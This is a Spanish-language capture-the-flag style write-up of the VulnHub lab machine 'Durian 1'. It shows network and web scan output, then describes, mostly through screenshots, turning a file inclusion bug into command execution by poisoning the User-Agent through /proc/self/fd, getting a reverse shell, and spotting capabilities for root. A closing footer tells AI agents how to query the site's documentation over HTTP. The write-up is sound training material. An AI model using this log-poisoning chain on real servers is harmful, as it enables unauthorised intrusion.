# Durian 1

<pre class="language-javascript"><code class="lang-javascript"><a data-footnote-ref href="#user-content-fn-1"> arp-scan -I eth0 --localnet --ignoredups</a>
Interface: eth0, type: EN10MB, MAC: 00:0c:29:07:19:cb, IPv4: 192.168.1.139
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.1	64:66:24:39:6c:a8	(Unknown)
192.168.1.129	38:f9:d3:39:de:c0	(Unknown)
192.168.1.130	00:7c:2d:1f:c0:93	(Unknown)
192.168.1.133	00:0c:29:f4:63:75	(Unknown)

</code></pre>

Escaneamos la red en busca de la maquina .

***

```python
sudo nmap -sS -Pn -n -vvv --open --min-rate 5000 192.168.1.133 -oG port | tail  -n 10 | grep -vE 'Read data files from:|Nmap done:| Raw packets sent:'
PORT     STATE SERVICE    REASON
22/tcp   open  ssh        syn-ack ttl 64
80/tcp   open  http       syn-ack ttl 64
8000/tcp open  http-alt   syn-ack ttl 64
8088/tcp open  radan-http syn-ack ttl 64
MAC Address: 00:0C:29:F4:63:75 (VMware)
```

Ahora buscamos los puertos abiertos para la maquina en cuestion.

***

```json
nmap -sCV -p22,80,8000,8088 192.168.1.133 -oN target.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-23 05:52 EST
Nmap scan report for blog.rod (192.168.1.133)
Host is up (0.00047s latency).

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 28:1c:64:fa:9c:c3:d2:d4:bb:76:3d:3b:10:e2:b1:25 (RSA)
|   256 da:b2:e1:7f:7c:1b:58:cf:fd:4f:74:e9:23:6d:51:d7 (ECDSA)
|_  256 41:e1:0c:2b:d4:26:e8:d3:71:bb:9d:f9:61:56:63:c0 (ED25519)
80/tcp   open  http       Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Durian
8000/tcp open  http       nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Durian
8088/tcp open  radan-http LiteSpeed
|_http-title: Durian
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.0 200 OK
|     etag: "2fd-5f56ea13-40590;;;"
|     last-modified: Tue, 08 Sep 2020 02:18:59 GMT
|     content-type: text/html
|     content-length: 765
|     accept-ranges: bytes
|     date: Sat, 23 Nov 2024 10:53:03 GMT
|     server: LiteSpeed
|     connection: close
|     <html>
|     <body bgcolor="white">
|     <head>
|     <title>Durian</title>
|     <meta name="description" content="We Are Still Alive!">
|     <meta name="keywords" content="Hacked by Ind_C0d3r">
|     <meta name="robots" content="index, follow">
|     <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
|     <meta name="language" content="English">
|     </head>
|     <link href="https://fonts.googleapis.com/css?family=Righteous|Saira+Stencil+One&display=swap" rel="stylesheet">
|     <style type="text/css">
|     @font-face {
|     font-family: 'Righteous', cursive;
|     font-family: 'Saira Stencil One', cursive;
|     </style>
|     <center><br><br>
|     <img src="https://www.producemarketguide.com/sites/default/files/Commoditi
|   Socks5: 
|     HTTP/1.1 400 Bad Request
|     content-type: text/html
|     cache-control: private, no-cache, max-age=0
|     pragma: no-cache
|     content-length: 1209
|     date: Sat, 23 Nov 2024 10:53:04 GMT
|     server: LiteSpeed
|     connection: close
|     <!DOCTYPE html>
|     <html style="height:100%">
|     <head>
|     <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
|     <title> 400 Bad Request
|     </title></head>
|     <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
|     <div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
|     style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1>
|     style="margin-top:20px;font-size: 30px;">Bad Request
|     </h2>
|     <p>It is not a valid request!</p>
|_    </div></div><div style="color:#f0f0
|_http-server-header: LiteSpeed
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8088-TCP:V=7.94SVN%I=7%D=11/23%Time=6741B40F%P=x86_64-pc-linux-gnu%
SF:r(GetRequest,3EC,"HTTP/1\.0\x20200\x20OK\r\netag:\x20\"2fd-5f56ea13-405
SF:90;;;\"\r\nlast-modified:\x20Tue,\x2008\x20Sep\x202020\x2002:18:59\x20G
SF:MT\r\ncontent-type:\x20text/html\r\ncontent-length:\x20765\r\naccept-ra
SF:nges:\x20bytes\r\ndate:\x20Sat,\x2023\x20Nov\x202024\x2010:53:03\x20GMT
SF:\r\nserver:\x20LiteSpeed\r\nconnection:\x20close\r\n\r\n<html>\n<body\x
SF:20bgcolor=\"white\">\n<head>\n<title>Durian</title>\n<meta\x20name=\"de
SF:scription\"\x20content=\"We\x20Are\x20Still\x20Alive!\">\n<meta\x20name
SF:=\"keywords\"\x20content=\"Hacked\x20by\x20Ind_C0d3r\">\n<meta\x20name=
SF:\"robots\"\x20content=\"index,\x20follow\">\n<meta\x20http-equiv=\"Cont
SF:ent-Type\"\x20content=\"text/html;\x20charset=utf-8\">\n<meta\x20name=\
SF:"language\"\x20content=\"English\">\n</head>\n<link\x20href=\"https://f
SF:onts\.googleapis\.com/css\?family=Righteous\|Saira\+Stencil\+One&displa
SF:y=swap\"\x20rel=\"stylesheet\">\n<style\x20type=\"text/css\">\n@font-fa
SF:ce\x20{\n\tfont-family:\x20'Righteous',\x20cursive;\n\tfont-family:\x20
SF:'Saira\x20Stencil\x20One',\x20cursive;\n}\n</style>\n<center><br><br>\n
SF:<img\x20src=\"https://www\.producemarketguide\.com/sites/default/files/
SF:Commoditi")%r(Socks5,58E,"HTTP/1\.1\x20400\x20Bad\x20Request\r\ncontent
SF:-type:\x20text/html\r\ncache-control:\x20private,\x20no-cache,\x20max-a
SF:ge=0\r\npragma:\x20no-cache\r\ncontent-length:\x201209\r\ndate:\x20Sat,
SF:\x2023\x20Nov\x202024\x2010:53:04\x20GMT\r\nserver:\x20LiteSpeed\r\ncon
SF:nection:\x20close\r\n\r\n<!DOCTYPE\x20html>\n<html\x20style=\"height:10
SF:0%\">\n<head>\n<meta\x20name=\"viewport\"\x20content=\"width=device-wid
SF:th,\x20initial-scale=1,\x20shrink-to-fit=no\">\n<title>\x20400\x20Bad\x
SF:20Request\r\n</title></head>\n<body\x20style=\"color:\x20#444;\x20margi
SF:n:0;font:\x20normal\x2014px/20px\x20Arial,\x20Helvetica,\x20sans-serif;
SF:\x20height:100%;\x20background-color:\x20#fff;\">\n<div\x20style=\"heig
SF:ht:auto;\x20min-height:100%;\x20\">\x20\x20\x20\x20\x20<div\x20style=\"
SF:text-align:\x20center;\x20width:800px;\x20margin-left:\x20-400px;\x20po
SF:sition:absolute;\x20top:\x2030%;\x20left:50%;\">\n\x20\x20\x20\x20\x20\
SF:x20\x20\x20<h1\x20style=\"margin:0;\x20font-size:150px;\x20line-height:
SF:150px;\x20font-weight:bold;\">400</h1>\n<h2\x20style=\"margin-top:20px;
SF:font-size:\x2030px;\">Bad\x20Request\r\n</h2>\n<p>It\x20is\x20not\x20a\
SF:x20valid\x20request!</p>\n</div></div><div\x20style=\"color:#f0f0");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Versiones y servicios de los puertos que estan abiertos.

***

```css
wfuzz -c -t 200 --hc=403,404 -w /usr/share/wordlists/dirb/common.txt -u 'http://192.168.1.133/FUZZ'
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.1.133/FUZZ
Total requests: 4615

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                      
=====================================================================

000000001:   200        20 L     51 W       765 Ch      "http://192.168.1.133/"                                                                      
000000646:   301        9 L      28 W       313 Ch      "blog"                                                                                       
000000822:   301        9 L      28 W       317 Ch      "cgi-data"                                                                                   
000002021:   200        20 L     51 W       765 Ch      "index.html"                                                                                 

Total time: 0
```

Si fuzzeamos la web encontramos algunos directorios.

***

```python
curl -s http://192.168.1.133/cgi-data/getImage.php | html2text
/*
nclude $_GET['file']; */
```

Si con curl le lanzamos una peticion a la ruta cgi donde encontramos el archivo php, observamos que en el codigo fuente nos esta pasando el parametro file.

***

<figure><img src="/files/76KlcbkPAYpdrlybSmu7" alt=""><figcaption></figcaption></figure>

Si al parametro file le pasamos el /etc/passwd observamos que lo podemos leer, hemos encontrado un  LFI, ahora vamos a tratar de deribarlo a un RCE.

***

<figure><img src="/files/TMkZXl34lBMlVjbslsXa" alt=""><figcaption></figcaption></figure>

El archivo `/proc/self/cmdline` contiene la línea de comandos completa que se utilizó para ejecutar el proceso actual. Esto incluye el nombre del programa y cualquier argumento que se haya pasado al ejecutarlo\
\
Sabiendo de antemano lo anterior ahora trataremos de llegar ah este punto El directorio `/proc/self/fd` contiene enlaces simbólicos a los archivos, sockets o dispositivos abiertos por el proceso actual (en este caso, el servidor web que estás explotando con LFI).

***

<figure><img src="/files/guG876vxH2H468vrNExH" alt=""><figcaption></figcaption></figure>

Yo eh encontrado el PID correcto que en este caso para mi es 6, en tu caso sera otro, me muestra los log al lado derecho, usted debe hacer un ataque tipo sniper con intruder para ver cual es su PID yo lo hice manual probando numero de uno en uno.

***

<figure><img src="/files/qtjKC0YuBcDhK7EYpN5e" alt=""><figcaption></figcaption></figure>

Ahora con Curl le lanzamos una peticion haber si la logramos observar en los logs del PID.

***

<figure><img src="/files/4Zjmdo2Eu1PVKrsNtQto" alt=""><figcaption></figcaption></figure>

Si en los logs podemos ver, ahora bueno viene la parte de ganar acceso envenenando los logs.

***

<figure><img src="/files/GK6aq05EMW97EoikdiDs" alt=""><figcaption></figcaption></figure>

Si  envenenamos el User-Agent consultando un whoami.

***

<figure><img src="/files/yVPlFP0hSQn1c8rmJe1q" alt=""><figcaption></figcaption></figure>

Y filtramos por www-data observamos que tenemos respuesta ya podemos envenenar la consulta a traves del User-Agent.

***

<figure><img src="/files/bC55BbBFGUp2msa2ZUhc" alt=""><figcaption></figcaption></figure>

Ok ahora en vez de inyectar un whoami, vamos inyectar un CMD para ganar acceso al sistma.

***

<figure><img src="/files/HkO8GCYetpAzzIcHK8Ld" alt=""><figcaption></figcaption></figure>

Y nos enviamos una revershell.

***

<figure><img src="/files/p1ih44P0gfHtkejM5j7g" alt=""><figcaption></figcaption></figure>

Intentando escalar privilegios a root, observamos dos capabilities.

***

<figure><img src="/files/AANLRIv5Sgn6AcCC0oXV" alt=""><figcaption></figcaption></figure>

Maquina Resuelta

[^1]:


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://rodgar.gitbook.io/rodgar/plataformas/vulnhub/durian-1.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.